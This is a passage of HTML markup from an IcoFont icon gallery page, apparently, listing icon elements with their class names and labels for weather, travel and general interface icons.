				<div class="icon"> 
					<i class="icofont-camping-vest"></i>
				</div> 
				<span> camping-vest </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-direction-sign"></i>
				</div> 
				<span> direction-sign </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-hill-side"></i>
				</div> 
				<span> hill-side </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-hill"></i>
				</div> 
				<span> hill </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-hotel"></i>
				</div> 
				<span> hotel </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-island-alt"></i>
				</div> 
				<span> island-alt </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-island"></i>
				</div> 
				<span> island </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-sandals-female"></i>
				</div> 
				<span> sandals-female </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-sandals-male"></i>
				</div> 
				<span> sandals-male </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-travelling"></i>
				</div> 
				<span> travelling </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-breakdown"></i>
				</div> 
				<span> breakdown </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-celsius"></i>
				</div> 
				<span> celsius </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-clouds"></i>
				</div> 
				<span> clouds </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-cloudy"></i>
				</div> 
				<span> cloudy </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-dust"></i>
				</div> 
				<span> dust </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-eclipse"></i>
				</div> 
				<span> eclipse </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-fahrenheit"></i>
				</div> 
				<span> fahrenheit </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-forest-fire"></i>
				</div> 
				<span> forest-fire </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-full-night"></i>
				</div> 
				<span> full-night </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-full-sunny"></i>
				</div> 
				<span> full-sunny </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-hail-night"></i>
				</div> 
				<span> hail-night </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-hail-rainy-night"></i>
				</div> 
				<span> hail-rainy-night </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-hail-rainy-sunny"></i>
				</div> 
				<span> hail-rainy-sunny </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-hail-rainy"></i>
				</div> 
				<span> hail-rainy </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-hail-sunny"></i>
				</div> 
				<span> hail-sunny </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-hail-thunder-night"></i>
				</div> 
				<span> hail-thunder-night </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-hail-thunder-sunny"></i>
				</div> 
				<span> hail-thunder-sunny </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-hail-thunder"></i>
				</div> 
				<span> hail-thunder </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-hail"></i>
				</div> 
				<span> hail </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-hill-night"></i>
				</div> 
				<span> hill-night </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-hill-sunny"></i>
				</div> 
				<span> hill-sunny </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-hurricane"></i>
				</div> 
				<span> hurricane </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-meteor"></i>
				</div> 
				<span> meteor </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-night"></i>
				</div> 
				<span> night </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-rainy-night"></i>
				</div> 
				<span> rainy-night </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-rainy-sunny"></i>
				</div> 
				<span> rainy-sunny </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-rainy-thunder"></i>
				</div> 
				<span> rainy-thunder </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-rainy"></i>
				</div> 
				<span> rainy </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-snow-alt"></i>
				</div> 
				<span> snow-alt </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-snow-flake"></i>
				</div> 
				<span> snow-flake </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-snow-temp"></i>
				</div> 
				<span> snow-temp </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-snow"></i>
				</div> 
				<span> snow </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-snowy-hail"></i>
				</div> 
				<span> snowy-hail </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-snowy-night-hail"></i>
				</div> 
				<span> snowy-night-hail </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-snowy-night-rainy"></i>
				</div> 
				<span> snowy-night-rainy </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-snowy-night"></i>
				</div> 
				<span> snowy-night </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-snowy-rainy"></i>
				</div> 
				<span> snowy-rainy </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-snowy-sunny-hail"></i>
				</div> 
				<span> snowy-sunny-hail </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-snowy-sunny-rainy"></i>
				</div> 
				<span> snowy-sunny-rainy </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-snowy-sunny"></i>
				</div> 
				<span> snowy-sunny </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-snowy-thunder-night"></i>
				</div> 
				<span> snowy-thunder-night </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-snowy-thunder-sunny"></i>
				</div> 
				<span> snowy-thunder-sunny </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-snowy-thunder"></i>
				</div> 
				<span> snowy-thunder </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-snowy-windy-night"></i>
				</div> 
				<span> snowy-windy-night </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-snowy-windy-sunny"></i>
				</div> 
				<span> snowy-windy-sunny </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-snowy-windy"></i>
				</div> 
				<span> snowy-windy </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-snowy"></i>
				</div> 
				<span> snowy </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-sun-alt"></i>
				</div> 
				<span> sun-alt </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-sun-rise"></i>
				</div> 
				<span> sun-rise </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-sun-set"></i>
				</div> 
				<span> sun-set </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-sun"></i>
				</div> 
				<span> sun </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-sunny-day-temp"></i>
				</div> 
				<span> sunny-day-temp </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-sunny"></i>
				</div> 
				<span> sunny </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-thunder-light"></i>
				</div> 
				<span> thunder-light </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-tornado"></i>
				</div> 
				<span> tornado </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-umbrella-alt"></i>
				</div> 
				<span> umbrella-alt </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-umbrella"></i>
				</div> 
				<span> umbrella </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-volcano"></i>
				</div> 
				<span> volcano </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-wave"></i>
				</div> 
				<span> wave </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-wind-scale-0"></i>
				</div> 
				<span> wind-scale-0 </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-wind-scale-1"></i>
				</div> 
				<span> wind-scale-1 </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-wind-scale-10"></i>
				</div> 
				<span> wind-scale-10 </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-wind-scale-11"></i>
				</div> 
				<span> wind-scale-11 </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-wind-scale-12"></i>
				</div> 
				<span> wind-scale-12 </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-wind-scale-2"></i>
				</div> 
				<span> wind-scale-2 </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-wind-scale-3"></i>
				</div> 
				<span> wind-scale-3 </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-wind-scale-4"></i>
				</div> 
				<span> wind-scale-4 </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-wind-scale-5"></i>
				</div> 
				<span> wind-scale-5 </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-wind-scale-6"></i>
				</div> 
				<span> wind-scale-6 </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-wind-scale-7"></i>
				</div> 
				<span> wind-scale-7 </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-wind-scale-8"></i>
				</div> 
				<span> wind-scale-8 </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-wind-scale-9"></i>
				</div> 
				<span> wind-scale-9 </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-wind-waves"></i>
				</div> 
				<span> wind-waves </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-wind"></i>
				</div> 
				<span> wind </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-windy-hail"></i>
				</div> 
				<span> windy-hail </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-windy-night"></i>
				</div> 
				<span> windy-night </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-windy-raining"></i>
				</div> 
				<span> windy-raining </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-windy-sunny"></i>
				</div> 
				<span> windy-sunny </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-windy-thunder-raining"></i>
				</div> 
				<span> windy-thunder-raining </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-windy-thunder"></i>
				</div> 
				<span> windy-thunder </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-windy"></i>
				</div> 
				<span> windy </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-addons"></i>
				</div> 
				<span> addons </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-address-book"></i>
				</div> 
				<span> address-book </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-adjust"></i>
				</div> 
				<span> adjust </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-alarm"></i>
				</div> 
				<span> alarm </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-anchor"></i>
				</div> 
				<span> anchor </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-archive"></i>
				</div> 
				<span> archive </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-at"></i>
				</div> 
				<span> at </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-attachment"></i>
				</div> 
				<span> attachment </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-audio"></i>
				</div> 
				<span> audio </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-automation"></i>
				</div> 
				<span> automation </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-badge"></i>
				</div> 
				<span> badge </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-bag-alt"></i>
				</div> 
				<span> bag-alt </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-bag"></i>
				</div> 
				<span> bag </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-ban"></i>
				</div> 
				<span> ban </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-bar-code"></i>
				</div> 
				<span> bar-code </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-bars"></i>
				</div> 
				<span> bars </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-basket"></i>
				</div> 
				<span> basket </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-battery-empty"></i>
				</div> 
				<span> battery-empty </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-battery-full"></i>
				</div> 
				<span> battery-full </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-battery-half"></i>
				</div> 
				<span> battery-half </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-battery-low"></i>
				</div> 
				<span> battery-low </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-beaker"></i>
				</div> 
				<span> beaker </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-beard"></i>
				</div> 
				<span> beard </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-bed"></i>
				</div> 
				<span> bed </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-bell"></i>
				</div> 
				<span> bell </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-beverage"></i>
				</div> 
				<span> beverage </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-bill"></i>
				</div> 
				<span> bill </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-bin"></i>
				</div> 
				<span> bin </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-binary"></i>
				</div> 
				<span> binary </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-binoculars"></i>
				</div> 
				<span> binoculars </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-bluetooth"></i>
				</div> 
				<span> bluetooth </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-bomb"></i>
				</div> 
				<span> bomb </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-book-mark"></i>
				</div> 
				<span> book-mark </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-box"></i>
				</div> 
				<span> box </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-briefcase"></i>
				</div> 
				<span> briefcase </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-broken"></i>
				</div> 
				<span> broken </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-bucket"></i>
				</div> 
				<span> bucket </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-bucket1"></i>
				</div> 
				<span> bucket1 </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-bucket2"></i>
				</div> 
				<span> bucket2 </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-bug"></i>
				</div> 
				<span> bug </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-building"></i>
				</div> 
				<span> building </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-bulb-alt"></i>
				</div> 
				<span> bulb-alt </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-bullet"></i>
				</div> 
				<span> bullet </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-bullhorn"></i>
				</div> 
				<span> bullhorn </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-bullseye"></i>
				</div> 
				<span> bullseye </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-calendar"></i>
				</div> 
				<span> calendar </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-camera-alt"></i>
				</div> 
				<span> camera-alt </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-camera"></i>
				</div> 
				<span> camera </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-card"></i>
				</div> 
				<span> card </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-cart-alt"></i>
				</div> 
				<span> cart-alt </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-cart"></i>
				</div> 
				<span> cart </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-cc"></i>
				</div> 
				<span> cc </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-charging"></i>
				</div> 
				<span> charging </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-chat"></i>
				</div> 
				<span> chat </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-check-alt"></i>
				</div> 
				<span> check-alt </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-check-circled"></i>
				</div> 
				<span> check-circled </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-check"></i>
				</div> 
				<span> check </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-checked"></i>
				</div> 
				<span> checked </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-children-care"></i>
				</div> 
				<span> children-care </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-clip"></i>
				</div> 
				<span> clip </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-clock-time"></i>
				</div> 
				<span> clock-time </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-close-circled"></i>
				</div> 
				<span> close-circled </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-close-line-circled"></i>
				</div> 
				<span> close-line-circled </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-close-line-squared-alt"></i>
				</div> 
				<span> close-line-squared-alt </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-close-line-squared"></i>
				</div> 
				<span> close-line-squared </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-close-line"></i>
				</div> 
				<span> close-line </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-close-squared-alt"></i>
				</div> 
				<span> close-squared-alt </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-close-squared"></i>
				</div> 
				<span> close-squared </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-close"></i>
				</div> 
				<span> close </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-cloud-download"></i>
				</div> 
				<span> cloud-download </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-cloud-refresh"></i>
				</div> 
				<span> cloud-refresh </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-cloud-upload"></i>
				</div> 
				<span> cloud-upload </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-cloud"></i>
				</div> 
				<span> cloud </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-code-not-allowed"></i>
				</div> 
				<span> code-not-allowed </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-code"></i>
				</div> 
				<span> code </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-comment"></i>
				</div> 
				<span> comment </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-compass-alt"></i>
				</div> 
				<span> compass-alt </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-compass"></i>
				</div> 
				<span> compass </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-computer"></i>
				</div> 
				<span> computer </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-connection"></i>
				</div> 
				<span> connection </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-console"></i>
				</div> 
				<span> console </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-contacts"></i>
				</div> 
				<span> contacts </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-contrast"></i>
				</div> 
				<span> contrast </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-copyright"></i>
				</div> 
				<span> copyright </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-credit-card"></i>
				</div> 
				<span> credit-card </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-crop"></i>
				</div> 
				<span> crop </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-crown"></i>
				</div> 
				<span> crown </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-cube"></i>
				</div> 
				<span> cube </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-cubes"></i>
				</div> 
				<span> cubes </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-dashboard-web"></i>
				</div> 
				<span> dashboard-web </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-dashboard"></i>
				</div> 
				<span> dashboard </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-data"></i>
				</div> 
				<span> data </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-database-add"></i>
				</div> 
				<span> database-add </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-database-locked"></i>
				</div> 
				<span> database-locked </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-database-remove"></i>
				</div> 
				<span> database-remove </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-database"></i>
				</div> 
				<span> database </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-delete"></i>
				</div> 
				<span> delete </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-diamond"></i>
				</div> 
				<span> diamond </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-dice-multiple"></i>
				</div> 
				<span> dice-multiple </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-dice"></i>
				</div> 
				<span> dice </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-disc"></i>
				</div> 
				<span> disc </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-diskette"></i>
				</div> 
				<span> diskette </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-document-folder"></i>
				</div> 
				<span> document-folder </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-download-alt"></i>
				</div> 
				<span> download-alt </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-download"></i>
				</div> 
				<span> download </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
